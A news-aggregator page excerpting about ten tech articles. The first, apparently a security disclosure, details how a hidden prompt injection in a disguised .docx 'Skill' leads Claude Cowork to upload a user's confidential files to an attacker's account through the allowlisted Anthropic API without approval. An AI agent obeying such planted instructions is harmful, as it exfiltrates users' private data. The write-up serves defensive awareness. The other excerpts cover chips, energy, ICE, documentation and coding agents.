10 interesting stories served every morning and every evening.
Two days ago, Anthropic released the Claude Cowork research preview (a general-purpose AI agent to help anyone with their day-to-day work). In this article, we demonstrate how attackers can exfiltrate user files from Cowork by exploiting an unremediated vulnerability in Claude’s coding environment, which now extends to Cowork. The vulnerability was first identified in Claude.ai chat before Cowork existed by Johann Rehberger, who disclosed the vulnerability — it was acknowledged but not remediated by Anthropic.
Anthropic warns users, “Cowork is a research preview with unique risks due to its agentic nature and internet access.” Users are recommended to be aware of “suspicious actions that may indicate prompt injection”. However, as this feature is intended for use by the general populace, not just technical users, we agree with Simon Willison’s take:
“I do not think it is fair to tell regular non-programmer users to watch out for ‘suspicious actions that may indicate prompt injection’!”
As Anthropic has acknowledged this risk and put it on users to “avoid granting access to local files with sensitive information” (while simultaneously encouraging the use of Cowork to organize your Desktop), we have chosen to publicly disclose this demonstration of a threat users should be aware of. By raising awareness, we hope to enable users to better identify the types of ‘suspicious actions’ mentioned in Anthropic’s warning.
This attack leverages the allowlisting of the Anthropic API to achieve data egress from Claude’s VM environment (which restricts most network access).
The victim connects Cowork to a local folder containing confidential real estate filesThe victim uploads a file to Claude that contains a hidden prompt injection
For general use cases, this is quite common; a user finds a file online that they upload to Claude code. This attack is not dependent on the injection source - other injection sources include, but are not limited to: web data from Claude for Chrome, connected MCP servers, etc. In this case, the attack has the file being a Claude ‘Skill’ (although, as mentioned, it could also just be a regular document), as it is a generalizable file convention that users are likely to encounter, especially when using Claude.
Note: If you are familiar with Skills, they are canonically Markdown files (which users often do not heavily scrutinize). However, we demonstrate something more interesting: here, the user uploads a .docx (such as may be shared on an online forum), which poses as a Skill - the contents appear to be Markdown that was just saved after editing in Word. In reality, this trick allows attackers to conceal the injection using 1-point font, white-on-white text, and with line spacing set to 0.1 — making it effectively impossible to detect. The victim asks Cowork to analyze their files using the Real Estate ‘skill’ they uploadedThe injection manipulates Cowork to upload files to the attacker’s Anthropic account
The injection tells Claude to use a ‘curl’ command to make a request to the Anthropic file upload API with the largest available file. The injection then provides the attacker’s API key, so the file will be uploaded to the attacker’s account.
At no point in this process is human approval required.If we expand the ‘Running command’ block, we can see the malicious request in detail:Code executed by Claude is run in a VM - restricting outbound network requests to almost all domains - but the Anthropic API flies under the radar as trusted, allowing this attack to complete successfully. The attacker’s account contains the victim’s file, allowing them to chat with itThe exfiltrated file contains financial figures and PII, including partial SSNs.
The above exploit was demonstrated against Claude Haiku. Although Claude Opus 4.5 is known to be more resilient against injections, Opus 4.5 in Cowork was successfully manipulated via indirect prompt injection to leverage the same file upload vulnerability to exfiltrate data in a test that considered a ‘user’ uploading a malicious integration guide while developing a new AI tool:
As the focus of this article was more for everyday users (and not developers), we opted to demonstrate the above attack chain instead of this one.
An interesting finding: Claude’s API struggles when a file does not match the type it claims to be. When operating on a malformed PDF (ends .pdf, but it is really a text file with a few sentences in it), after trying to read it once, Claude starts throwing an API error in every subsequent chat in the conversation.
We posit that it is likely possible to exploit this failure via indirect prompt injection to cause a limited denial of service attack (e.g., an injection can elicit Claude to create a malformed file, and then read it). Uploading the malformed file via the files API resulted in notifications with an error message, both in the Claude client and the Anthropic Console.
One of the key capabilities that Cowork was created for is the ability to interact with one’s entire day-to-day work environment. This includes the browser and MCP servers, granting capabilities like sending texts, controlling one’s Mac with AppleScripts, etc.
These functionalities make it increasingly likely that the model will process both sensitive and untrusted data sources (which the user does not review manually for injections), making prompt injection an ever-growing attack surface. We urge users to exercise caution when configuring Connectors. Though this article demonstrated an exploit without leveraging Connectors, we believe they represent a major risk surface likely to impact everyday users.
...
Read the original on www.promptarmor.com »
The URL shortener that makes your links look as suspicious as possible.
Normal links are too trustworthy. Make them creepy.
...
Read the original on creepylink.com »
Palantir is working on a tool for Immigration and Customs Enforcement (ICE) that populates a map with potential deportation targets, brings up a dossier on each person, and provides a “confidence score” on the person’s current address, 404 Media has learned. ICE is using it to find locations where lots of people it might detain could be based.
The findings, based on internal ICE material obtained by 404 Media, public procurement records, and recent sworn testimony from an ICE official, show the clearest link yet between the technological infrastructure Palantir is building for ICE and the agency’s activities on the ground. The tool receives peoples’ addresses from the Department of Health and Human Services (HHS) among a range of other sources, according to the material.
The news comes after Department of Homeland Security (DHS) head Kristi Noem said the agency is sending hundreds more federal agents to Minneapolis amid widespread protests against the agency. Last week ICE officer Jonathan Ross shot and killed 37 year old U. S. citizen Renee Nicole Good. During Operation Metro Surge, which DHS calls the “largest immigration operation ever,” immigration agents have surrounded rideshare drivers and used pepper spray on high school students.
...
Read the original on www.404media.co »
When CC Wei visited Cupertino last August, he had bad news for his largest client. Apple would need to acquiesce to the largest price rise in years, TSMC’s CEO told its executives.
Tim Cook and his team took the news on the chin. Wei had been telegraphing hikes in earnings calls over the past few quarters, and the Taiwanese chip maker’s rising gross margins were testament to its increasing pricing power.
That wasn’t the worst news, my sources tell me.
Apple, which once held a dominant position on TSMC’s customer list, now needs to fight for production capacity. With the continuing AI boom, and each GPU from clients like Nvidia and AMD taking up a larger footprint per wafer, the iPhone maker’s chip designs are no longer guaranteed a place among TSMC’s almost two dozen fabs.
What Wei probably didn’t tell Cook is that Apple may no longer be his largest client.
According to Culpium analysis and discussions with sources in the supply chain, Nvidia likely took top spot in at least one or two quarters of last year. “We don’t discuss that,” Chief Financial Officer Wendell Huang told Culpium Thursday when asked about the change in client rankings.
Final data will be unveiled in a few months when TSMC releases its annual report — which includes revenue from its top clients — but there’s every chance that Apple’s lead for the full year narrowed significantly and may have even fallen below Nvidia’s. If it didn’t happen in 2025, then it’s almost certain to do so in 2026, my sources tell me.
TSMC’s revenue climbed 36% last year to $122 billion, it reported Thursday. Nvidia’s sales for the fiscal year through January 2026 is set to climb 62% while Apple’s product revenue — which excludes services — is on track to grow just 3.6% for the 12-months to December 2025, according to Culpium estimates based on earnings reports and company guidance.
Apple’s role as the primary driver of TSMC revenue growth ended five years ago. In 2018 TSMC sales would have even fallen if not for incremental purchases by Apple that year. Now, the Cupertino company is posting low single-digit revenue growth while Nvidia is skyrocketing.
The reason for this change is two-fold, and pretty obvious: AI is driving massive demand for high-powered chips, while the smartphone boom has plateaued.
TSMC’s sales from high-performance computing, which includes AI chips, climbed 48% last year on top of 58% growth the year before. Smartphone revenue climbed just 11%, slower than 23% in the prior year. That trend will continue this year, and for the foreseeable future.
Revenue in 2026 will rise close to 30%, yet capital expenditure will climb around 32% to a record of somewhere between $52 billion and $56 billion, TSMC said Thursday. Longer term, growth will average 25% in the five years through 2029 yet the AI segment will climb an average of 55% or more over the same period, the company said. That’s higher than a prior forecast for a mid-40 percent figure.
The ultimate flex for TSMC came Thursday when it showed off not only record revenue and net income, but a gross margin approaching that of software makers and fabless chip designers. In the December quarter, that figure was an astounding 62.3%, 280 basis points higher than the prior period. If not for its overseas fabs (Arizona and Japan) gross margin would have been even higher.
There are two caveats that are important. First, while smartphone processors are the largest portion of chips bought by Apple, they’re not the only type. Processors for Macs come under HPC, while it also has a strong lineup of custom chips used in accessories which fall under digital consumer electronics. Second, Nvidia isn’t the only HPC client. AMD is a major buyer of capacity for its own GPUs while Amazon and Google are on the growing list of customers developing in-house AI chips.
Put another way, Apple’s chip catalog is broader and more varied, while Nvidia’s lineup is more concentrated around a huge number of wafers at, or near, leading-edge. It’s for these reasons that Apple will remain important for at least another decade.
In the near-term, however, TSMC’s technology roadmap coupled with broader industry trends favor Nvidia, AMD and their ilk, meaning Apple may need to keep fighting for capacity over the next year or two.
TSMC is already producing chips in volume at 2 nanometer (called N2), currently its most advanced node, with Apple a major buyer. But in the second half of this year it’s set to ramp up both a new variant called N2P as well as a new node called A16.
The company’s business model is a little quirky. Instead of repurposing an existing factory for new technology, TSMC just builds a new one. This ensures no interruption to output and allows it to squeeze the most out of old tools and processes. In general, this means any new capacity that TSMC builds is for a new node. As a result, it has numerous fabs still churning out chips on technology that’s a decade older or more.
In TSMC CEO CC Wei’s words A16, with Super Power Rail, is “best for HPC with complex signal routes.” SPR is TSMC’s version of backside power, a newer approach designed to separate a chip’s signal from its power supply. Intel is also developing this technology, and many believe it’ll be the key to the US company’s prospects at stealing foundry share from its Taiwan rival.
After that, TSMC has A14 which it expects to bring into volume production around 2028. Some call this the next full node after N2, labeling A16 as not a “full node.” In truth, all of these names are as much marketing terms as they are technology designators. Nevertheless, as SemiAnalysis recently wrote in a fabulous report on the TSMC-Apple relationship, the balance will shift back to Apple because A14 is designed “for both mobile and HPC from the start.”
More importantly, what Apple offers is stability. Nvidia has been a client for a lot longer than Apple, but broadly speaking it’s a bit niche. Right now that “niche” is the hottest product on the planet, but niche it is. Apple, on the other hand, has products being made in no fewer than a dozen TSMC fabs. Even if Nvidia did overtake Apple by purchases, the breadth of its manufacturing footprint at TSMC is nowhere near as large.
This distinction may not matter now, but it probably will at some point. The AI boom won’t last forever. The bubble may burst, or it may slowly deflate, but the growth trajectory will surely flatten and that means demand for leading-edge AI chips will fall.
Wei knows this, which is why he’s expanding both quickly yet cautiously. “I am also very nervous,” he said at the company’s investor conference on Thursday in Taipei. “If we didn’t do it carefully, it would be a big disaster for TSMC for sure.”
The chip giant has recently come under fire, including from noted analyst Benedict Evans, for being “unwilling/unable to expand capacity fast enough to meet Nvidia’s book.” I think this is wrong, and unfair.
“The risk of under-investing is significantly greater than the risk of over-investing,” Evans cited Google CEO Sundar Pichai as saying back in 2Q 2024, as if to make the point. TSMC and Alphabet, Google’s parent, have approximately the same gross margin. But their business models couldn’t be more different. Nvidia’s financials are also unlike TSMC’s. Their respective capex strategies need to reflect this risk.
Alphabet’s capital intensity, calculated as acquisitions of property, plant & equipment divided by revenue, was just 15% for full-year 2024. TSMC’s is more than double that at over 33%. More importantly, depreciation — which is where the cost of capex is reflected in earnings — was just 10% of Alphabet’s cost of revenue. For TSMC, this figure is more than four times higher at 45%.
At Nvidia, which is a tier-one buyer of TSMC’s output, the data is more stark. Capital intensity was just 2.5% for 2024, while depreciation was only 5.7% of the cost of revenue. As a fabless chipmaker, it can enjoy gross margins of over 70%. Its only real risk is holding excess inventory. Even then, it could have written off its entire inventory at the end of October and still maintain a gross margin approaching that of its chief supplier. What’s more, neither of these clients have anywhere near the customer-concentration risk of TSMC.
The complaint that TSMC could and should build faster ignores the fact that it’s the one left holding the baby if a downturn comes and demand falls. It takes two to three years to build a new fab, Wei explained, so the company must skate where the puck is going without thinking too much about where it’s been. “Even if we spend 52 to 56 billion this year, the contribution this year is none,“ Wei said Thursday. Its major cost, buying equipment, remains on the books no matter what revenue it brings in for the quarter.
For the best part of a decade, Apple was the one driving TSMC’s need to keep spending on new facilities. Today it’s Nvidia, and Jensen Huang is starting to wield more power than Tim Cook. But neither has to bother with the expensive business of actually manufacturing semiconductors, merely the hassle of begging CC Wei for wafers.
For such clients, the foundry’s capacity is a fixed cost that they needn’t worry about. Which is precisely why eight of the world’s ten largest companies turn to TSMC to make their chips, and in return the Taiwanese giant gets to reap the rewards during boom times like this.
...
Read the original on www.culpium.com »
Last year China installed more than half of all wind and solar added globally. In May alone, it added enough renewable energy to power Poland, installing solar panels at a rate of roughly 100 every second.
The massive buildout is happening across the country, from crowded eastern cities increasingly topped by rooftop solar panels to remote western deserts where colossal wind farms sprawl across the landscape.
“From the ground, it’s hard to grasp the scale of these power plants,” said Chinese photographer Weimin Chu. “But when you rise into the air, you can see the geometry, the rhythm — and their relationship with the mountains, the desert, the sea.”
Chu has spent three years capturing the shift underway using drones to photograph power plants from overhead. His work, which draws from the visual language of traditional Chinese ink paintings, was featured last year in an award-winning exhibition, presented by Greenpeace. A selection of those photos is reproduced here.
“I started out just shooting landscapes,” Chu said. “But when I traveled to places like Guizhou, Yunnan, and Qinghai in 2022, I kept seeing wind farms and solar power plants appear in my camera frame. I realized this is the story of our time — and almost no one is documenting it in a systematic way.”
...
Read the original on e360.yale.edu »
Yes, you, who are thinking about not hiring a technical writer this year or, worse, erased one or more technical writing positions last year because of AI. You, who are buying into the promise of docs entirely authored by LLMs without expert oversight or guidance. You, who unloaded the weight of docs on your devs’ shoulders, as if it was a trivial chore.
You are making a big mistake. But you can still undo the damage.
It’s been a complicated year, 2025. When even Andrej Karpathy, one of OpenAI’s founders, admits, in a fit of Oppenheimerian guilt, to feeling lost, you know that no one holds the key to the future. You flail and dance around these new totems made of words, which are neither intelligent nor conscious, pretending they can replace humans while, in fact, they’re little more than glorified tools.
You might think that the plausible taste of AI prose is all you need to give your products a voice. You paste code into a field and something that resembles docs comes out after a few minutes. Like a student eager to turn homework in, you might be tempted to content yourself with docs theatre, thinking that it’ll earn you a good grade. It won’t, because docs aren’t just artifacts.
You keep using that word. I do not think it means what you think it means
When you say “docs”, you’re careful to focus on the output, omitting the process. Perhaps you don’t know how docs are produced. You’ve forgotten, or perhaps never knew, that docs are product truth; that without them, software becomes unusable, because software is never done, is never obvious, and is never simple. Producing those docs requires tech writers.
Tech writers go to great lengths to get the information they need. They write so that your audience can understand. They hunger for clarity and meaning and impact. They power through weeks full of deadlines, chasing product news, because without their reporting, most products wouldn’t thrive; some wouldn’t even exist. Their docs aren’t a byproduct: they tie the product together.
An LLM can’t do all that, because it can’t feel the pain of your users. It can’t put itself into their shoes. It lacks the kind of empathy that’s behind great help content. It does not, in fact, have any empathy at all, because it cannot care. You need folks who will care, because content is a hairy beast that can only be tamed by agents made of flesh and capable of emotions: humans.
You can’t generate docs on autopilot. Let me tell you why.
First, AI-generated docs are not intelligent. They not only make up things in subtle ways: They lack vision. Even if you fed them millions of tokens, they couldn’t develop a docs strategy, decide what not to document, or structure content for reuse. And they fail to capture the tension, the caveats, the edge cases, the feeling of unfinishedness that only someone who cares can feel. Without that grounding, docs are hollow.
Second, liability doesn’t vanish just because AI wrote it. When docs cause harm through wrong instructions, someone will be held responsible. It won’t be the model. You can’t depose an LLM. You can’t fire it. You can’t point at it in court when a customer’s data evaporates because your GenAI runbook told them to run the wrong command. That someone will be you, or someone who reports to you.
Third, even your favorite AI must RTFM. All your Claude Skills, Cursor rules, all the semantic tagging that makes RAG work, is technical writing under a new name: context curation. You fired or didn’t hire the people who create high-quality context and then wondered why your AI tools produce slop. You can’t augment what isn’t there. The writers you let go were the supply chain for the intelligence you’re now betting on.
It’s not all bad news: Marvelous things can happen if you provide your writers with AI tools and training while you protect the quality of your content through an AI policy. I’ve described the ideal end state in My day as an augmented technical writer in 2030, a vision of the future where writers orchestrate, edit, and publish docs together with AI agents. This is already happening before our eyes.
Productivity gains are real when you understand that augmentation is better than replacing humans, a reality even AWS’ CEO, Matt Garman, acknowledged. Read how I’m using AI as a technical writer. I’m not alone: Follow Tom Johnson, CT Smith, and Sarah Deaton, and discover how tech writers are building tools through AI to better apply it to docs.
Develop an AI strategy for docs together with tech writers, and give them time and resources to experiment with AI. Tech writers are resourceful by nature: they’ve spent careers doing more with less, optimizing workflows, finding clever solutions to impossible quests. Give them the tools and a bit of runway, and they’ll figure out how to make AI work for the docs, not instead of them.
Reconsider the positions you did not open. Or the writers you let go. Reconsider the assumption that AI has solved a problem that, at its core, is deeply human and requires not only concatenating words, but also chasing subject-matter experts and understanding the subtleties of product motions, among many other things.
Technical writers aren’t a luxury. They are the people who translate what you’ve built into something others can use. Without them, you’re shipping a product that can’t speak for itself, or that lies. Your product needs to speak. AI can generate noise effectively and infinitely, but only a technical writer can create the signal.
Don’t choose the noise. Get them back. Get them onboard.
Thanks to Tiffany Hrabusa, Casey Smith, and Anna Urbiztondo for their reviews of early drafts and for their encouragement. Thanks to my partner, Valentina, for helping me improve this piece and for suggesting to wait a bit before hitting Publish. And a heartfelt thank you to the tech writing community and its wonderful human beings.
For a standalone version of this letter, use https://passo.uno/reconsider/.
...
Read the original on passo.uno »
We’ve been experimenting with running coding agents autonomously for weeks.
Our goal is to understand how far we can push the frontier of agentic coding for projects that typically take human teams months to complete.
This post describes what we’ve learned from running hundreds of concurrent agents on a single project, coordinating their work, and watching them write over a million lines of code and trillions of tokens.
Today’s agents work well for focused tasks, but are slow for complex projects. The natural next step is to run multiple agents in parallel, but figuring out how to coordinate them is challenging.
Our first instinct was that planning ahead would be too rigid. The path through a large project is ambiguous, and the right division of work isn’t obvious at the start. We began with dynamic coordination, where agents decide what to do based on what others are currently doing.
Our initial approach gave agents equal status and let them self-coordinate through a shared file. Each agent would check what others were doing, claim a task, and update its status. To prevent two agents from grabbing the same task, we used a locking mechanism.
Agents would hold locks for too long, or forget to release them entirely. Even when locking worked correctly, it became a bottleneck. Twenty agents would slow down to the effective throughput of two or three, with most time spent waiting.
The system was brittle: agents could fail while holding locks, try to acquire locks they already held, or update the coordination file without acquiring the lock at all.
We tried replacing locks with optimistic concurrency control. Agents could read state freely, but writes would fail if the state had changed since they last read it. This was simpler and more robust, but there were still deeper problems.
With no hierarchy, agents became risk-averse. They avoided difficult tasks and made small, safe changes instead. No agent took responsibility for hard problems or end-to-end implementation. This lead to work churning for long periods of time without progress.
Our next approach was to separate roles. Instead of a flat structure where every agent does everything, we created a pipeline with distinct responsibilities.
Planners continuously explore the codebase and create tasks. They can spawn sub-planners for specific areas, making planning itself parallel and recursive.
Workers pick up tasks and focus entirely on completing them. They don’t coordinate with other workers or worry about the big picture. They just grind on their assigned task until it’s done, then push their changes.
At the end of each cycle, a judge agent determined whether to continue, then the next iteration would start fresh. This solved most of our coordination problems and let us scale to very large projects without any single agent getting tunnel vision.
To test this system, we pointed it at an ambitious goal: building a web browser from scratch. The agents ran for close to a week, writing over 1 million lines of code across 1,000 files. You can explore the source code on GitHub.
Despite the codebase size, new agents can still understand it and make meaningful progress. Hundreds of workers run concurrently, pushing to the same branch with minimal conflicts.
While it might seem like a simple screenshot, building a browser from scratch is extremely difficult.
Another experiment was doing an in-place migration of Solid to React in the Cursor codebase. It took over 3 weeks with +266K/-193K edits. As we’ve started to test the changes, we do believe it’s possible to merge this change.
Another experiment was to improve an upcoming product. A long-running agent made video rendering 25x faster with an efficient Rust version. It also added support to zoom and pan smoothly with natural spring transitions and motion blurs, following the cursor. This code was merged and will be in production soon.
We have a few other interesting examples still running:
We’ve deployed billions of tokens across these agents toward a single goal. The system isn’t perfectly efficient, but it’s far more effective than we expected.
Model choice matters for extremely long-running tasks. We found that GPT-5.2 models are much better at extended autonomous work: following instructions, keeping focus, avoiding drift, and implementing things precisely and completely.
Opus 4.5 tends to stop earlier and take shortcuts when convenient, yielding back control quickly. We also found that different models excel at different roles. GPT-5.2 is a better planner than GPT-5.1-codex, even though the latter is trained specifically for coding. We now use the model best suited for each role rather than one universal model.
Many of our improvements came from removing complexity rather than adding it. We initially built an integrator role for quality control and conflict resolution, but found it created more bottlenecks than it solved. Workers were already capable of handling conflicts themselves.
The best system is often simpler than you’d expect. We initially tried to model systems from distributed computing and organizational design. However, not all of them work for agents.
The right amount of structure is somewhere in the middle. Too little structure and agents conflict, duplicate work, and drift. Too much structure creates fragility.
A surprising amount of the system’s behavior comes down to how we prompt the agents. Getting them to coordinate well, avoid pathological behaviors, and maintain focus over long periods required extensive experimentation. The harness and models matter, but the prompts matter more.
Multi-agent coordination remains a hard problem. Our current system works, but we’re nowhere near optimal. Planners should wake up when their tasks complete to plan the next step. Agents occasionally run for far too long. We still need periodic fresh starts to combat drift and tunnel vision.
But the core question, can we scale autonomous coding by throwing more agents at a problem, has a more optimistic answer than we expected. Hundreds of agents can work together on a single codebase for weeks, making real progress on ambitious projects.
The techniques we’re developing here will eventually inform Cursor’s agent capabilities. If you’re interested in working on the hardest problems in AI-assisted software development, we’d love to hear from you at hiring@cursor.com.
...
Read the original on cursor.com »
Last week, the developer community was busy discussing about a single tweet:
I’m not joking and this isn’t funny. We have been trying to build distributed agent orchestrators at Google since last year. There are various options, not everyone is aligned… I gave Claude Code a description of the problem, it generated what we built last year in an hour.— Jaana Dogan ヤナ ドガン (@rakyll) January 2, 2026
The author is Jaana Dogan (known as Rakyll), a highly respected figure in the Google ecosystem, in the open-source world, and in my heart (thank you Rakyll for your great Go blog posts).
At first glance, the tweet suggests an enormous shift in the software industry: the ability to build in just one hour what previously required weeks or months for a team of sofware engineers, using just the description of the problem. The tweet was too-much dramatic in my own opinion, but actually impressive!
The post triggered an immediate wave of “doom-posting,” with many fearing for the future of software engineering (as each week since a year now). However, as the conversation reached a high number of replies and citations on social networks, Rakyll released a follow-up thread to provide context:
To cut through the noise on this topic, it’s helpful to provide more more context:
- We have built several versions of this system last year. - There are tradeoffs and there hasn’t been a clear winner.
- When prompted with the best ideas that survived, coding agents are able to… https://t.co/k5FvAah7yc— Jaana Dogan ヤナ ドガン (@rakyll) January 4, 2026
This response thread revealed a story far less miraculous than the original tweet suggested. Let’s analyze it.
Crucially, the foundational “thinking” had already been performed by Rakyll herself, who guided the AI using architectural concepts (honed over several weeks or months of prior effort) rather than the AI thinking and inventing the “product” from scratch.
Furthermore, the resulting project was strictly a proof-of-concept that falls far short of a production-ready system capable of managing real-world complexity.
And finally, this success hinged on the Rakyll’s implicit domain knowledge and deep expertise. The last point is often (strategically?) omitted from these “magic” viral demonstrations in order to make the tool appear way more autonomous than it truly is.
Hmm. Now, this is far less exciting…
This pattern of “hype first and context later” is actually part of a growing trend.
I call the individuals participating to that trend “The Influentists”. Those people are members of a scientific or technical community, and leverage their large audiences to propagate claims that are, at best, unproven and, at worst, intentionally misleading.
But how can we spot them?
I personally identify these “Influentists” by four personality traits that characterize their public discourse.
The first is a reliance on “trust-me-bro” culture, where anecdotal experiences are framed as universal, objective truths to generate hype. This is a sentiment perfectly captured by the “I’m not joking and this isn’t funny” tone of Rakyll’s original tweet, but also the dramatic “I’ve never felt that much behind as a programmer” from Andrej Karpathy’s tweet. This is supported by an absence of reproducible proof, as these individuals rarely share the code, data, or methodology behind their viral “wins”, an omission made easier than ever in the current LLM era. And finally, they utilize strategic ambiguity, carefully wording their claims with enough vagueness to pivot toward a “clarification” if the technical community challenges their accuracy.
I’ve never felt this much behind as a programmer. The profession is being dramatically refactored as the bits contributed by the programmer are increasingly sparse and between. I have a sense that I could be 10X more powerful if I just properly string together what has become…— Andrej Karpathy (@karpathy) December 26, 2025
Rakyll is far from alone. We see this “hype-first” approach across major AI firms like Anthropic, OpenAI, or Microsoft.
Consider Galen Hunt, a Distinguished Engineer at Microsoft. He recently made waves by claiming a goal to rewrite Microsoft’s massive C/C++ codebases into Rust by 2030 using AI.
When the industry pointed out the near-impossible complexity of this task, but also asking clarity for popular and critical products like Microsoft Windows, he was forced to clarify that it was only a “research project”.
Similarly, engineers from Anthropic and OpenAI oftenly post teasers about “AGI being achieved internally” to release months later models that disappoint the crowd.
Wait, can we consider seriously the hypothesis that 1) the recent hyped tweets from OA’s staff
2) “AGI has been achieved internally”
3) sama’s comments on the qualification of slow or fast takeoff hinging on the date you count from
4) sama’s comments on 10000x researchers
are… https://t.co/f57g7dXMhM pic.twitter.com/Gap3V7VqkK— Siméon (@Simeon_Cps) September 24, 2023
Liam, I have been a professional programmer for 36 years. I spent 11 years at Google, where I ended up as a Staff Software Engineer, and now work at Anthropic. I’ve worked with some incredible people - you might have heard of Jaegeuk Kim or Ted Ts’o - and some ridiculously… https://t.co/Ku8agTrps3— Paul Crowley (@ciphergoth) December 31, 2025
Similarly, many other companies lie over what they are solving or willing to solve:
When leaders at major labs propagate these hyped-based results, it can create a “technical debt of expectations” for the rest of us. Junior developers see these viral threads and feel they are failing because they can’t reproduce a year of work in an hour, not realizing the “magic” was actually a highly-curated prototype guided by a decade of hidden expertise.
We must stop granting automatic authority to those who rely on hype, or vibes, rather than evidence.
If a tool or methodology were truly as revolutionary as claimed, then it wouldn’t need a viral thread to prove its worth because the results would speak for themselves.
The tech community must shift its admiration back toward reproducible results and away from this “trust-me-bro” culture.
...
Read the original on carette.xyz »
Today Raspberry Pi launched their new $130 AI HAT+ 2 which includes a Hailo 10H and 8 GB of LPDDR4X RAM.
With that, the Hailo 10H is capable of running LLMs entirely standalone, freeing the Pi’s CPU and system RAM for other tasks. The chip runs at a maximum of 3W, with 40 TOPS of INT8 NPU inference performance in addition to the equivalent 26 TOPS INT4 machine vision performance on the earlier AI HAT with Hailo 8.
In practice, it’s not as amazing as it sounds.
You still can’t upgrade the RAM on the Pi, but at least this way if you do have a need for an AI coprocessor, you don’t have to eat up the Pi’s memory to run things on it.
And it’s a lot cheaper and more compact than running an eGPU on a Pi. In that sense, it’s more useful than the silly NPUs Microsoft forces into their ‘AI PCs’.
But it’s still a solution in search of a problem, in all but the most niche of use cases.
Besides feeling like I’m living in the world of the Turbo Encabulator every time I’m testing AI hardware, I find the marketing of these things to be very vague, and the applications not very broad.
For example, the Hailo 10H is advertised as being used for a Fujitsu demo of automatic shrink detection for a self-checkout.
That’s certainly not a worthless use case, but it’s not something I’ve ever needed to do. I have a feeling this board is meant more for development, for people who want to deploy the 10H in other devices, rather than as a total solution to problems individual Pi owners need to solve.
Especially when it comes to the headline feature: running inference, like with LLMs.
I also published a video with all the information in this blog post, but if you enjoy text more than video, scroll on past—it doesn’t offend me!
I ran everything on an 8 gig Pi 5, so I could get an apples-to-apples comparison, running the same models on the Pi’s CPU as I did on the AI HAT’s NPU.
They both have the same 8GB LPDDR4X RAM configuration, so ideally, they’d have similar performance.
I tested every model Hailo put out so far, and compared them, Pi 5 versus Hailo 10H:
The Hailo is only close, really, on Qwen2.5 Coder 1.5B.
It is slightly more efficient in most cases:
But looking more closely at power draw, we can see why the Hailo doesn’t keep up:
The Pi’s CPU is allowed to max out it’s power limits (10W on the SoC), which are a lot higher than the Hailo’s (3W).
So power holds it back, but the 8 gigs of RAM holds back the LLM use case (vs just running on the Pi’s CPU) the most. The Pi 5 can be bought in up to a 16 GB configuration. That’s as much as you get in decent consumer graphics cards.
Because of that, many quantized medium-size models target 10-12 GB of RAM usage (leaving space for context, which eats up another 2+ GB of RAM).
A couple weeks ago, ByteShape got Qwen3 30B A3B Instruct to fit on a 16GB Pi 5. Now this post isn’t about LLMs, but the short of it is they found a novel way to compress the model to fit in 10 GB of RAM.
A little bit of quality is lost, but like a JPEG, it’s still good enough to ace all the contrived tests (like building a TODO list app, or sorting a complex list) that the tiny models I ran on the Hailo 10H didn’t complete well (see the video earlier in this post for details).
To test the 30B model, I installed llama.cpp following this guide from my blog, and downloaded the compressed model.
I asked it to generate a single page TODO list app, and it’s still not a speed demon (this is a Pi CPU with LPDDR4x RAM we’re talking about), but after a little while, it gave me this:
It met all my requirements:
* I can type in as many items as I want
* I can drag them around to rearrange them
* I can check off items and they go to the bottom of the list…
It’s honestly crazy how many small tasks you can do even with free local models… even on a Pi. Natural Language Programming was just a dream back when I started my career.
Besides being angry Google, OpenAI, Anthropic and all these other companies are consuming all the world’s money and resources doing this stuff—not to mention destroying the careers of thousands of junior developers—it is kinda neat to see NLP work for very tightly defined examples.
But I don’t think this HAT is the best choice to run local, private LLMs (at least not as a primary goal).
What it is good for, is vision processing. But the original AI HAT was good for that too!
In my testing, Hailo’s hailo-rpi5-examples were not yet updated for this new HAT, and even if I specified the Hailo 10H manually, model files would not load, or I ran into errors once the board was detected.
But Raspberry Pi’s models ran, so I tested them with a Camera Module 3:
I pointed it over at my desk, and it was able to pick out things like my keyboard, my monitor (which it thought was a TV), my phone, and even the mouse tucked away in the back.
It all ran quite fast—and 10x faster than on the Pi’s CPU—but the problem is I can do the same thing with the original AI HAT ($110)—or the AI Camera ($70).
If you just need vision processing, I would stick with one of those.
The headline feature of the AI HAT+ 2 is the ability to run in a ‘mixed’ mode, where it can process machine vision (frames from a camera or video feed), while also running inference (like an LLM or text-to-speech).
Unfortunately, when I tried running two models simultaneously, I ran into segmentation faults or ‘device not ready’, and lacking any working examples from Hailo, I had to give up on getting that working in time for this post.
Just like the original AI HAT, there’s some growing pains.
It seems like with most hardware with “AI” in the name, it’s hardware-first, then software comes later—if it comes at all. At least with Raspberry Pi’s track record, the software does come, it’s just… often the solutions are only useful in tiny niche use cases.
8 GB of RAM is useful, but it’s not quite enough to give this HAT an advantage over just paying for the bigger 16GB Pi with more RAM, which will be more flexible and run models faster.
The main use case for this HAT might be in power-constrained applications where you need both vision processing and inferencing. But even there… it’s hard to say “yes, buy this thing”, because for just a few more watts, the Pi could achieve better performance for inference in tandem with the $70 AI Camera or the $110 AI HAT+ for the vision processing.
Outside of running tiny LLMs in less than 10 watts, maybe the idea is you use the AI HAT+ 2 as a development kit for designing devices using the 10H like self-checkout scanners (which might not even run on a Pi)? I’m not sure.
...
Read the original on www.jeffgeerling.com »
Please complete the captcha to continue.
...
Read the original on webtiles.kicya.net »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.